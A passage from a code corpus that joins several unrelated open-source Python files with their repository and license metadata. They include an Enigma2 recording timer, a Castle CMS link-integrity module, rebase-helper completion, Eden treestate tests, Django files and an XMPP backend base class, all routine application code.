if parent_sid and parent_tsid: # check for subservice
sid = sref.getUnsignedData(1)
tsid = sref.getUnsignedData(2)
sref.setUnsignedData(1, parent_sid)
sref.setUnsignedData(2, parent_tsid)
sref.setUnsignedData(5, 0)
sref.setUnsignedData(6, 0)
check = sref.toCompareString() == refstr
num = 0
if check:
check = False
event = eEPGCache.getInstance().lookupEventId(sref, eventid)
num = event and event.getNumOfLinkageServices() or 0
sref.setUnsignedData(1, sid)
sref.setUnsignedData(2, tsid)
sref.setUnsignedData(5, parent_sid)
sref.setUnsignedData(6, parent_tsid)
for cnt in range(num):
subservice = event.getLinkageService(sref, cnt)
if sref.toCompareString() == subservice.toCompareString():
check = True
break
if check:
timer_end = x.end
type_offset = 0
if x.justplay:
type_offset = 5
if (timer_end - x.begin) <= 1:
timer_end += 60
if x.always_zap:
type_offset = 10
if x.repeated != 0:
if bt is None:
bt = localtime(begin)
et = localtime(end)
						bday = bt.tm_wday
begin2 = bday * 1440 + bt.tm_hour * 60 + bt.tm_min
end2 = et.tm_wday * 1440 + et.tm_hour * 60 + et.tm_min
if x.repeated & (1 << bday):
xbt = localtime(x.begin)
xet = localtime(timer_end)
xbegin = bday * 1440 + xbt.tm_hour * 60 + xbt.tm_min
xend = bday * 1440 + xet.tm_hour * 60 + xet.tm_min
if xend < xbegin:
xend += 1440
if begin2 < xbegin <= end2:
if xend < end2: # recording within event
time_match = (xend - xbegin) * 60
type = type_offset + 3
else: # recording last part of event
time_match = (end2 - xbegin) * 60
type = type_offset + 1
elif xbegin <= begin2 <= xend:
if xend < end2: # recording first part of event
time_match = (xend - begin2) * 60
type = type_offset + 4
else: # recording whole event
time_match = (end2 - begin2) * 60
type = type_offset + 2
else:
if begin < x.begin <= end:
if timer_end < end: # recording within event
time_match = timer_end - x.begin
type = type_offset + 3
else: # recording last part of event
time_match = end - x.begin
type = type_offset + 1
elif x.begin <= begin <= timer_end:
if timer_end < end: # recording first part of event
time_match = timer_end - begin
type = type_offset + 4
else: # recording whole event
time_match = end - begin
type = type_offset + 2
if time_match:
if type in (2,7,12): # When full recording do not look further
returnValue = (time_match, [type])
break
elif returnValue:
if type not in returnValue[1]:
returnValue[1].append(type)
else:
returnValue = (time_match, [type])
return returnValue
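	# Decoding of the (time_match, [type]) tuple returned above: base type
	# 1 = last part of the event, 2 = whole event, 3 = within the event,
	# 4 = first part; add 5 for zap (justplay) timers and 10 for always_zap
	# timers, so e.g. type 12 means "whole event, always_zap".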
def removeEntry(self, entry):
print "[Timer] Remove " + str(entry)
# avoid re-enqueuing
entry.repeated = False
# abort timer.
# this sets the end time to current time, so timer will be stopped.
entry.autoincrease = False
entry.abort()
if entry.state != entry.StateEnded:
self.timeChanged(entry)
print "state: ", entry.state
print "in processed: ", entry in self.processed_timers
print "in running: ", entry in self.timer_list
# autoincrease instanttimer if possible
if not entry.dontSave:
for x in self.timer_list:
if x.setAutoincreaseEnd():
self.timeChanged(x)
# now the timer should be in the processed_timers list. remove it from there.
self.processed_timers.remove(entry)
self.saveTimer()
def shutdown(self):
self.saveTimer()
|
pli3/enigma2-pli
|
RecordTimer.py
|
Python
|
gpl-2.0
| 32,081
|
from castle.cms.interfaces import IReferenceNamedImage
from plone.app.uuid.utils import uuidToObject
from persistent.mapping import PersistentMapping
from persistent.dict import PersistentDict
from lxml.html import fromstring
from lxml.html import tostring
from plone import api
from plone.app.blocks.layoutbehavior import ILayoutAware
from plone.app.linkintegrity import handlers as li
from plone.app.linkintegrity.parser import extractLinks
from plone.tiles.data import ANNOTATIONS_KEY_PREFIX
from z3c.relationfield import RelationValue
from zope.annotation.interfaces import IAnnotations
from zope.component import getUtility
from zope.intid.interfaces import IIntIds
from zope.keyreference.interfaces import NotYet
def scan(obj):
""" a dexterity based object was modified """
if not li.check_linkintegrity_dependencies(obj):
return
refs = get_content_links(obj)
li.updateReferences(obj, refs)
def get_ref(obj, intids=None):
    if intids is None:
        intids = getUtility(IIntIds)
    objid = None
    try:
        objid = intids.getId(obj)
    except KeyError:
        try:
            intids.register(obj)
            objid = intids.getId(obj)
        except NotYet:
            # if we get a NotYet error, the object is not attached yet;
            # return None so callers skip it and the links are picked up
            # later, once the object has an intid
            pass
    return objid
def get_content_links(obj):
refs = set()
if ILayoutAware.providedBy(obj):
behavior_data = ILayoutAware(obj)
# get data from tile data
annotations = IAnnotations(obj)
for key in annotations.keys():
if key.startswith(ANNOTATIONS_KEY_PREFIX):
data = annotations[key]
refs |= get_tile_data_links(obj, data)
if not behavior_data.contentLayout and behavior_data.content:
dom = fromstring(behavior_data.content)
for el in dom.cssselect('.mosaic-text-tile .mosaic-tile-content'):
links = extractLinks(tostring(el))
refs |= li.getObjectsFromLinks(obj, links)
try:
        # we probably should scan more fields than just obj.text here...
value = obj.text.raw
links = extractLinks(value)
refs |= li.getObjectsFromLinks(obj, links)
except AttributeError:
pass
if getattr(obj, 'image', None):
if IReferenceNamedImage.providedBy(obj.image):
sub_obj = uuidToObject(obj.image.reference)
if sub_obj:
                objid = get_ref(sub_obj)  # reference the image object itself, not its container
if objid:
refs.add(RelationValue(objid))
return refs
def get_tile_data_links(obj, data):
refs = set()
if type(data) in (dict, PersistentMapping, PersistentDict):
for field_name in ('content', 'video', 'image', 'images', 'audio'):
if field_name not in data:
continue
val = data.get(field_name)
if isinstance(val, basestring):
links = extractLinks(val)
refs |= li.getObjectsFromLinks(obj, links)
elif isinstance(val, list):
# could be list of uids
refs |= get_refs_from_uids(val)
return refs
def get_refs_from_uids(uids):
intids = getUtility(IIntIds)
objects = set()
catalog = api.portal.get_tool('portal_catalog')
for brain in catalog(UID=uids):
obj = brain.getObject()
objid = get_ref(obj, intids)
if objid:
relation = RelationValue(objid)
objects.add(relation)
return objects
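# Usage sketch (hypothetical; assumes a configured Plone/Castle site, so it is
# not runnable standalone):
#     from castle.cms import linkintegrity
#     linkintegrity.scan(obj)                      # refresh references after an edit
#     refs = linkintegrity.get_content_links(obj)  # -> set of RelationValue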
|
castlecms/castle.cms
|
castle/cms/linkintegrity.py
|
Python
|
gpl-2.0
| 3,563
|
# -*- coding: utf-8 -*-
#
# This tool helps you to rebase package to the latest version
# Copyright (C) 2013-2014 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Authors: Petr Hracek <phracek@redhat.com>
# Tomas Hozza <thozza@redhat.com>
import re
import sys
from rebasehelper.cli import CLI
from rebasehelper.archive import Archive
class Completion(object):
@staticmethod
def extensions():
archives = Archive.get_supported_archives()
return [a.lstrip('.') for a in archives]
@staticmethod
def options():
def get_delimiter(parser, action):
if action.nargs == 0:
return None
fmt = parser._get_formatter() # pylint: disable=protected-access
usage = fmt._format_actions_usage([action], []) # pylint: disable=protected-access
option_string = action.option_strings[0]
idx = usage.find(option_string)
if idx == -1:
return None
return usage[idx + len(option_string)]
parser = CLI.build_parser()
result = []
actions = parser._get_optional_actions() + parser._get_positional_actions() # pylint: disable=protected-access
for action in actions:
if not action.option_strings:
continue
delimiter = get_delimiter(parser, action) or ''
result.append(dict(
options=[o + delimiter.strip() for o in action.option_strings],
choices=action.choices or []))
return result
@classmethod
def dump(cls):
options = cls.options()
return {
# pattern list of extensions
'RH_EXTENSIONS': '@({})'.format('|'.join(cls.extensions())),
# array of options
'RH_OPTIONS': '({})'.format(' '.join(['"{}"'.format(' '.join(o['options'])) for o in options])),
# array of choices of respective options
'RH_CHOICES': '({})'.format(' '.join(['"{}"'.format(' '.join(o['choices'])) for o in options])),
}
def replace_placeholders(s, **kwargs):
placeholder_re = re.compile(r'@(\w+)@')
matches = list(placeholder_re.finditer(s))
result = s
for match in reversed(matches):
replacement = kwargs.get(match.group(1), '')
result = result[:match.start(0)] + replacement + result[match.end(0):]
return result
def main():
if len(sys.argv) != 3:
return 1
with open(sys.argv[1]) as f:
s = f.read()
s = replace_placeholders(s, **Completion.dump())
with open(sys.argv[2], 'w') as f:
f.write(s)
return 0
if __name__ == '__main__':
main()
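    # Minimal inline check (an illustration, not part of the original script):
    # replace_placeholders() substitutes @NAME@ tokens from the keyword
    # arguments and replaces unknown tokens with an empty string.
    assert replace_placeholders('x=@A@ y=@B@', A='1') == 'x=1 y='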
|
phracek/rebase-helper
|
rebasehelper/completion.py
|
Python
|
gpl-2.0
| 3,343
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.
from __future__ import absolute_import
import itertools
import os
import posixpath
import random
import tempfile
import unittest
import silenttestrunner
from bindings import treestate
from edenscm.mercurial import pycompat
from hghave import require
testtmp = os.getenv("TESTTMP") or tempfile.mkdtemp("test-treestate")
def randname():
length = random.randint(1, 4)
return "".join(random.sample("abcdef", 1)[0] for i in range(length))
def randpath(path=""):
# pop components from path
for i in range(1 + random.randrange(path.count("/") + 1)):
path = os.path.dirname(path)
# push new components to path
maxlevel = 4
for i in range(1 + random.randrange(max([1, maxlevel - path.count("/")]))):
path = posixpath.join(path, randname())
if not path:
path = randname()
return path
def genpaths():
"""generate random paths"""
path = ""
while True:
nextpath = randpath(path)
yield nextpath
path = nextpath
def genfiles():
"""generate random tuple of (path, bits, mode, size, mtime, copied)"""
pathgen = genpaths()
while True:
path = next(pathgen)
bits = 0
mode = random.randint(0, 0o777)
size = random.randint(0, 1 << 31)
mtime = random.randint(-1, 1 << 31)
copied = None
# bits (StateFlags)
for bit in [
treestate.EXIST_P1,
treestate.EXIST_P2,
treestate.EXIST_NEXT,
treestate.IGNORED,
treestate.NEED_CHECK,
]:
if random.randint(0, 1):
bits |= bit
if random.randint(0, 1):
bits |= treestate.COPIED
copied = next(pathgen)
yield (path, bits, mode, size, mtime, copied)
class testtreestate(unittest.TestCase):
def testempty(self):
tree = treestate.treestate(os.path.join(testtmp, "empty"), 0)
self.assertEqual(len(tree), 0)
self.assertEqual(tree.getmetadata(), b"")
self.assertEqual(tree.walk(0, 0), [])
self.assertTrue(tree.hasdir("/"))
for path in ["", "a", "/", "b/c", "d/"]:
self.assertFalse(path in tree)
if path and path != "/":
self.assertFalse(tree.hasdir(path))
if path != "/":
if path.endswith("/"):
self.assertIsNone(tree.getdir(path))
else:
self.assertIsNone(tree.get(path, None))
def testinsert(self):
tree = treestate.treestate(os.path.join(testtmp, "insert"), 0)
count = 5000
files = list(itertools.islice(genfiles(), count))
expected = {}
for path, bits, mode, size, mtime, copied in files:
tree.insert(path, bits, mode, size, mtime, copied)
expected[path] = (bits, mode, size, mtime, copied)
self.assertEqual(len(tree), len(expected))
for path in tree.walk(0, 0):
self.assertTrue(tree.hasdir(os.path.dirname(path) + "/"))
self.assertEqual(tree.get(path, None), expected[path])
def testremove(self):
tree = treestate.treestate(os.path.join(testtmp, "remove"), 0)
count = 5000
files = list(itertools.islice(genfiles(), count))
expected = {}
for path, bits, mode, size, mtime, copied in files:
tree.insert(path, bits, mode, size, mtime, copied)
if (mtime & 1) == 0:
tree.remove(path)
if path in expected:
del expected[path]
else:
expected[path] = (bits, mode, size, mtime, copied)
self.assertEqual(len(tree), len(expected))
for path in tree.walk(0, 0):
self.assertTrue(tree.hasdir(os.path.dirname(path) + "/"))
self.assertEqual(tree.get(path, None), expected[path])
def testwalk(self):
treepath = os.path.join(testtmp, "walk")
tree = treestate.treestate(treepath, 0)
count = 5000
files = list(itertools.islice(genfiles(), count))
expected = {}
for path, bits, mode, size, mtime, copied in files:
tree.insert(path, bits, mode, size, mtime, copied)
expected[path] = (bits, mode, size, mtime, copied)
def walk(setbits, unsetbits):
return sorted(
k
for k, v in pycompat.iteritems(expected)
if ((v[0] & unsetbits) == 0 and (v[0] & setbits) == setbits)
)
def check(setbits, unsetbits):
self.assertEqual(
walk(setbits, unsetbits), sorted(tree.walk(setbits, unsetbits))
)
for i in ["in-memory", "flushed"]:
for bit in [treestate.IGNORED, treestate.COPIED]:
check(0, bit)
check(bit, 0)
check(treestate.EXIST_P1, treestate.EXIST_P2)
rootid = tree.flush()
tree = treestate.treestate(treepath, rootid)
def testdirfilter(self):
treepath = os.path.join(testtmp, "walk")
tree = treestate.treestate(treepath, 0)
files = ["a/b", "a/b/c", "b/c", "c/d"]
for path in files:
tree.insert(path, 1, 2, 3, 4, None)
self.assertEqual(tree.walk(1, 0, None), files)
self.assertEqual(
tree.walk(1, 0, lambda dir: dir in {"a/b/", "c/"}), ["a/b", "b/c"]
)
self.assertEqual(tree.walk(1, 0, lambda dir: True), [])
def testflush(self):
treepath = os.path.join(testtmp, "flush")
tree = treestate.treestate(treepath, 0)
tree.insert("a", 1, 2, 3, 4, None)
tree.setmetadata(b"1")
rootid1 = tree.flush()
tree.remove("a")
tree.insert("b", 1, 2, 3, 4, None)
tree.setmetadata(b"2")
rootid2 = tree.flush()
tree = treestate.treestate(treepath, rootid1)
self.assertTrue("a" in tree)
self.assertFalse("b" in tree)
self.assertEqual(tree.getmetadata(), b"1")
tree = treestate.treestate(treepath, rootid2)
self.assertFalse("a" in tree)
self.assertTrue("b" in tree)
self.assertEqual(tree.getmetadata(), b"2")
def testsaveas(self):
treepath = os.path.join(testtmp, "saveas")
tree = treestate.treestate(treepath, 0)
tree.insert("a", 1, 2, 3, 4, None)
tree.setmetadata(b"1")
tree.flush()
tree.insert("b", 1, 2, 3, 4, None)
tree.remove("a")
treepath = "%s-savedas" % treepath
tree.setmetadata(b"2")
rootid = tree.saveas(treepath)
tree = treestate.treestate(treepath, rootid)
self.assertFalse("a" in tree)
self.assertTrue("b" in tree)
self.assertEqual(tree.getmetadata(), b"2")
def testfiltered(self):
treepath = os.path.join(testtmp, "filtered")
tree = treestate.treestate(treepath, 0)
tree.insert("a/B/c", 1, 2, 3, 4, None)
filtered = tree.getfiltered("A/B/C", lambda x: x.upper(), 1)
self.assertEqual(filtered, ["a/B/c"])
filtered = tree.getfiltered("A/B/C", lambda x: x, 2)
self.assertEqual(filtered, [])
def testpathcomplete(self):
treepath = os.path.join(testtmp, "pathcomplete")
tree = treestate.treestate(treepath, 0)
paths = ["a/b/c", "a/b/d", "a/c", "de"]
for path in paths:
tree.insert(path, 1, 2, 3, 4, None)
def complete(prefix, fullpath=False):
completed = []
tree.pathcomplete(prefix, 0, 0, completed.append, fullpath)
return completed
self.assertEqual(complete(""), ["a/", "de"])
self.assertEqual(complete("d"), ["de"])
self.assertEqual(complete("a/"), ["a/b/", "a/c"])
self.assertEqual(complete("a/b/"), ["a/b/c", "a/b/d"])
self.assertEqual(complete("a/b/c"), ["a/b/c"])
self.assertEqual(complete("", True), paths)
def testgetdir(self):
treepath = os.path.join(testtmp, "filtered")
tree = treestate.treestate(treepath, 0)
tree.insert("a/b/c", 3, 0, 0, 0, None)
tree.insert("a/d", 5, 0, 0, 0, None)
self.assertEqual(tree.getdir("/"), (3 | 5, 3 & 5))
self.assertEqual(tree.getdir("a/"), (3 | 5, 3 & 5))
self.assertEqual(tree.getdir("a/b/"), (3, 3))
self.assertIsNone(tree.getdir("a/b/c/"))
tree.insert("a/e/f", 10, 0, 0, 0, None)
self.assertEqual(tree.getdir("a/"), (3 | 5 | 10, 3 & 5 & 10))
tree.remove("a/e/f")
self.assertEqual(tree.getdir("a/"), (3 | 5, 3 & 5))
def testsubdirquery(self):
treepath = os.path.join(testtmp, "subdir")
tree = treestate.treestate(treepath, 0)
paths = ["a/b/c", "a/b/d", "a/c", "de"]
for path in paths:
tree.insert(path, 1, 2, 3, 4, None)
self.assertEqual(tree.tracked(""), paths)
self.assertEqual(tree.tracked("de"), ["de"])
self.assertEqual(tree.tracked("a"), [])
self.assertEqual(tree.tracked("a/"), ["a/b/c", "a/b/d", "a/c"])
self.assertEqual(tree.tracked("a/b/"), ["a/b/c", "a/b/d"])
self.assertEqual(tree.tracked("a/b"), [])
self.assertEqual(tree.tracked("a/c/"), [])
self.assertEqual(tree.tracked("a/c"), ["a/c"])
if __name__ == "__main__":
silenttestrunner.main(__name__)
|
facebookexperimental/eden
|
eden/scm/tests/test-treestate.py
|
Python
|
gpl-2.0
| 9,519
|
Dependencies
Python2.7
Python Requests
python-rt https://gitlab.labs.nic.cz/labs/python-rt
(should have a local copy installed on tsbackup, untested with newer versions)
jsondb
request_tracker
these last two are in the freegeek github repository
configure EMAIL, WEEKLYDB, MONTHLYDB on installed copy
use in cronjob with -m flag set
there is an (untested) fabfile.cfg that can be used with fabfile.py to ease install
requires python-fabric
|
freegeek-pdx/ts_rt_scripts
|
README_generate_completion_reports.py
|
Python
|
gpl-2.0
| 448
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-10 09:46
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('catalog', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='bookinstance',
name='borrower',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),
),
]
|
tridc/django_local_library
|
catalog/migrations/0002_bookinstance_borrower.py
|
Python
|
gpl-3.0
| 661
|
''' forms, mostly used for simple tastypie validation '''
from django.contrib.gis import forms
class MeetingForm(forms.Form):
''' form for meetings '''
day_of_week = forms.IntegerField(min_value=1, max_value=7)
start_time = forms.TimeField()
end_time = forms.TimeField()
name = forms.CharField(max_length=100)
description = forms.CharField(max_length=255, required=False)
address = forms.CharField(max_length=300)
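# Usage sketch (hypothetical; requires Django settings to be configured):
#     form = MeetingForm({'day_of_week': 2, 'start_time': '18:00',
#                         'end_time': '19:00', 'name': 'Weekly meeting',
#                         'address': '123 Main St'})
#     form.is_valid()  # -> True; a day_of_week outside 1..7 would fail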
|
mcjug2015/mfserver2
|
django_app/forms.py
|
Python
|
gpl-3.0
| 444
|
# This file is part of xmpp-backends (https://github.com/mathiasertl/xmpp-backends).
#
# xmpp-backends is free software: you can redistribute it and/or modify it under the terms of the GNU General
# Public License as published by the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# xmpp-backends is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the
# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along with xmpp-backends. If not, see
# <http://www.gnu.org/licenses/>.
"""Common code for XMPP backends."""
import ipaddress
import logging
import random
import re
import string
import time
from datetime import datetime
from datetime import timedelta
from importlib import import_module
import pytz
from .constants import CONNECTION_HTTP_BINDING
from .constants import CONNECTION_UNKNOWN
from .constants import CONNECTION_XMPP
log = logging.getLogger(__name__)
class BackendError(Exception):
"""All backend exceptions should be a subclass of this exception."""
pass
class InvalidXmppBackendError(BackendError):
"""Raised when a module cannot be imported."""
pass
class BackendConnectionError(BackendError):
"""Raised when the backend is unavailable."""
pass
class NotSupportedError(BackendError):
"""Raised when a backend does not support a specific function.
This error may be thrown only with specific versions, e.g. if it requires minimum version.
"""
pass
class UserExists(BackendError):
"""Raised when a user already exists."""
pass
class UserNotFound(BackendError):
"""Raised when a user is not found."""
def __init__(self, node, domain, resource=None):
self.node = node
self.domain = domain
self.resource = resource
def __str__(self):
s = '%s@%s' % (self.node, self.domain)
if self.resource is not None:
s += '/%s' % self.resource
return s
class UserSession(object):
"""An object describing a user session.
:param backend: The XMPP backend used for retrieving this session.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param resource: The resource of the user.
:param priority: The priority of this connection.
:param ip_address: The IP address of this connection.
:param uptime: A timestamp of when this connection came online.
:param status: The status message for this connection (e.g. "I am available.").
:param connection_type: The type of connection.
    :param encrypted: If this connection is encrypted. This may be ``None`` if the backend is not able to
        decide if the connection is encrypted (e.g. if it is an HTTP bind connection).
:param compressed: If this connection uses XMPP stream compression. This is always ``None`` for
connections where this is not applicable, e.g. Websocket connections.
"""
def __init__(self, backend, username, domain, resource, priority, ip_address, uptime, status, status_text,
connection_type, encrypted, compressed):
self._backend = backend
self.username = username
self.domain = domain
self.jid = '%s@%s' % (username, domain)
self.resource = resource
self.priority = priority
self.ip_address = ip_address
self.uptime = uptime
self.status = status
self.status_text = status_text
self.connection_type = connection_type
self.encrypted = encrypted
self.compressed = compressed
def __eq__(self, other):
return isinstance(other, UserSession) and self.jid == other.jid and self.resource == other.resource
def __hash__(self):
return hash((self.jid, self.resource))
def __str__(self):
return '%s@%s/%s' % (self.username, self.domain, self.resource)
def __repr__(self):
return '<UserSession: %s@%s/%s>' % (self.username, self.domain, self.resource)
class XmppBackendBase(object):
"""Base class for all XMPP backends."""
library = None
"""Import-party of any third-party library you need.
Set this attribute to an import path and you will be able to access the module as ``self.module``. This
way you don't have to do a module-level import, which would mean that everyone has to have that library
installed, even if they're not using your backend.
:param version_cache_timeout: How long the API version for this backend will be cached.
:type version_cache_timeout: int or timedelta
"""
_module = None
minimum_version = None
version_cache_timeout = None
version_cache_timestamp = None
version_cache_value = None
def __init__(self, version_cache_timeout=3600):
if isinstance(version_cache_timeout, int):
version_cache_timeout = timedelta(seconds=version_cache_timeout)
self.version_cache_timeout = version_cache_timeout
super(XmppBackendBase, self).__init__()
@property
def module(self):
"""The module specified by the ``library`` attribute."""
if self._module is None:
if self.library is None:
raise ValueError(
"Backend '%s' doesn't specify a library attribute" % self.__class__)
try:
if '.' in self.library:
mod_path, cls_name = self.library.rsplit('.', 1)
mod = import_module(mod_path)
self._module = getattr(mod, cls_name)
else:
self._module = import_module(self.library)
except (AttributeError, ImportError):
raise ValueError("Couldn't load %s backend library" % cls_name)
return self._module
def datetime_to_timestamp(self, dt):
"""Helper function to convert a datetime object to a timestamp.
If datetime instance ``dt`` is naive, it is assumed that it is in UTC.
        In Python 3, this just calls ``datetime.timestamp()``; in Python 2, it subtracts any timezone offset
and returns the difference since 1970-01-01 00:00:00.
Note that the function always returns an int, even in Python 3.
>>> XmppBackendBase().datetime_to_timestamp(datetime(2017, 9, 17, 19, 59))
1505678340
>>> XmppBackendBase().datetime_to_timestamp(datetime(1984, 11, 6, 13, 21))
468595260
:param dt: The datetime object to convert. If ``None``, returns the current time.
:type dt: datetime
:return: The seconds in UTC.
:rtype: int
"""
if dt is None:
return int(time.time())
if not dt.tzinfo:
dt = pytz.utc.localize(dt)
return int(dt.timestamp())
def get_random_password(self, length=32, chars=None):
"""Helper function that gets a random password.
:param length: The length of the random password.
:type length: int
:param chars: A string with characters to choose from. Defaults to all ASCII letters and digits.
:type chars: str
"""
if chars is None:
chars = string.ascii_letters + string.digits
return ''.join(random.choice(chars) for x in range(length))
@property
def api_version(self):
"""Cached version of :py:func:`~xmpp_backends.base.XmppBackendBase.get_api_version`."""
now = datetime.utcnow()
if self.version_cache_timestamp and self.version_cache_timestamp + self.version_cache_timeout > now:
return self.version_cache_value # we have a cached value
self.version_cache_value = self.get_api_version()
if self.minimum_version and self.version_cache_value < self.minimum_version:
raise NotSupportedError('%s requires ejabberd >= %s' % (self.__class__.__name__,
self.minimum_version))
self.version_cache_timestamp = now
return self.version_cache_value
def get_api_version(self):
"""Get the API version used by this backend.
Note that this function is usually not invoked directly but through
:py:attr:`~xmpp_backends.base.XmppBackendBase.api_version`.
The value returned by this function is used by various backends to determine how to call various API
        backends and/or how to parse the data returned by them. Backends generally assume that this
        function always works and returns the correct value.
If your backend implementation cannot get this value, it should be passed via the constructor and
        statically returned for the lifetime of the instance.
"""
raise NotImplementedError
def user_exists(self, username, domain):
"""Verify that the given user exists.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:return: ``True`` if the user exists, ``False`` if not.
:rtype: bool
"""
raise NotImplementedError
def user_sessions(self, username, domain):
"""Get a list of all current sessions for the given user.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
        :return: A list of :py:class:`~xmpp_backends.base.UserSession` describing the user sessions.
:rtype: list of :py:class:`~xmpp_backends.base.UserSession`
"""
raise NotImplementedError
def stop_user_session(self, username, domain, resource, reason=''):
"""Stop a specific user session, identified by its resource.
A resource uniquely identifies a connection by a specific client.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param resource: The resource of the connection
:type resource: str
"""
raise NotImplementedError
def create_user(self, username, domain, password, email=None):
"""Create a new user.
:param username: The username of the new user.
:type username: str
:param domain: The domain of the new user.
:type domain: str
:param password: The password of the new user.
:param email: The email address provided by the user.
"""
raise NotImplementedError
def create_reservation(self, username, domain, email=None):
"""Reserve a new account.
This method is called when a user account should be reserved, meaning that the account can no longer
be registered by anybody else but the user cannot yet log in either. This is useful if e.g. an email
confirmation is still pending.
The default implementation calls :py:func:`~xmpp_backends.base.XmppBackendBase.create_user` with a
random password.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param email: The email address provided by the user. Note that at this point it is not confirmed.
You are free to ignore this parameter.
"""
password = self.get_random_password()
        self.create_user(username=username, domain=domain, password=password, email=email)
def confirm_reservation(self, username, domain, password, email=None):
"""Confirm a reservation for a username.
The default implementation just calls :py:func:`~xmpp_backends.base.XmppBackendBase.set_password` and
optionally :py:func:`~xmpp_backends.base.XmppBackendBase.set_email`.
"""
self.set_password(username=username, domain=domain, password=password)
if email is not None:
self.set_email(username=username, domain=domain, email=email)
def check_password(self, username, domain, password):
"""Check the password of a user.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param password: The password to check.
:type password: str
:return: ``True`` if the password is correct, ``False`` if not.
:rtype: bool
"""
raise NotImplementedError
def set_password(self, username, domain, password):
"""Set the password of a user.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param password: The password to set.
:type password: str
"""
raise NotImplementedError
def get_last_activity(self, username, domain):
"""Get the last activity of the user.
The datetime object returned should be a naive datetime object representing the time in UTC.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:return: A naive datetime object in UTC representing the last activity.
:rtype: datetime
"""
raise NotImplementedError
def set_last_activity(self, username, domain, status='', timestamp=None):
"""Set the last activity of the user.
.. NOTE::
If your backend requires a Unix timestamp (seconds since 1970-01-01), you can use the
:py:func:`~xmpp_backends.base.XmppBackendBase.datetime_to_timestamp` convenience function to
convert it to an integer.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param status: The status text.
:type status: str
:param timestamp: A datetime object representing the last activity. If the object is not
timezone-aware, assume UTC. If ``timestamp`` is ``None``, assume the current date and time.
:type timestamp: datetime
"""
raise NotImplementedError
def block_user(self, username, domain):
"""Block the specified user.
The default implementation calls :py:func:`~xmpp_backends.base.XmppBackendBase.set_password` with a
random password.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
"""
self.set_password(username, domain, self.get_random_password())
def set_email(self, username, domain, email):
"""Set the email address of a user."""
raise NotImplementedError
def check_email(self, username, domain, email):
"""Check the email address of a user.
**Note:** Most backends don't implement this feature.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
"""
raise NotImplementedError
def expire_reservation(self, username, domain):
"""Expire a username reservation.
This method is called when a reservation expires. The default implementation just calls
:py:func:`~xmpp_backends.base.XmppBackendBase.remove_user`. This is fine if you do not override
:py:func:`~xmpp_backends.base.XmppBackendBase.create_reservation`.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
"""
self.remove_user(username, domain)
def message_user(self, username, domain, subject, message):
"""Send a message to the given user.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param subject: The subject of the message.
:param message: The content of the message.
"""
pass
def all_users(self, domain):
"""Get all users for a given domain.
:param domain: The domain of interest.
:type domain: str
:return: A set of all users. The usernames do not include the domain, so ``user@example.com`` will
just be ``"user"``.
:rtype: set of str
"""
raise NotImplementedError
def all_domains(self):
"""List of all domains used by this backend.
:return: List of all domains served by this backend.
:rtype: list of str
"""
raise NotImplementedError
def all_user_sessions(self):
"""List all current user sessions.
:param domain: Optionally only return sessions for the given domain.
:return: A list :py:class:`~xmpp_backends.base.UserSession` for all sessions.
:rtype: list of :py:class:`~xmpp_backends.base.UserSession`
"""
raise NotImplementedError
def remove_user(self, username, domain):
"""Remove a user.
This method is called when the user explicitly wants to remove her/his account.
:param username: The username of the new user.
:type username: str
:param domain: The domain of the user.
:type domain: str
"""
raise NotImplementedError
def stats(self, stat, domain=None):
"""Get statistical value about the XMPP server.
        Minimal statistics that should be supported are ``"registered_users"`` and ``"online_users"``. The
specific backend might support additional stats.
        :param stat: The name of the statistic to query.
:type stat: str
        :param domain: Limit the statistic to the given domain. If omitted, give statistics
about all users.
:type domain: str
:return: The current value of the requested statistic.
:rtype: int
"""
raise NotImplementedError
class EjabberdBackendBase(XmppBackendBase):
"""Base class for ejabberd related backends.
This class overwrites a few methods common to all ejabberd backends.
"""
minimum_version = (14, 7)
    def parse_version_string(self, version):
        """Parse a dotted version string into a tuple of ints, e.g. '16.01' -> (16, 1)."""
        return tuple(int(t) for t in version.split('.'))
def parse_status_string(self, data):
match = re.search(r'([^ ]*) is running in that node', data)
if not match:
raise BackendError('Could not determine API version.')
return self.parse_version_string(match.groups()[0].split('-', 1)[0])
def has_usable_password(self, username, domain):
"""Always return ``True``.
In ejabberd there is no such thing as a "banned" account or an unusable password. Even ejabberd's
``ban_account`` command only sets a random password that the user could theoretically guess.
"""
return True
def set_email(self, username, domain, email):
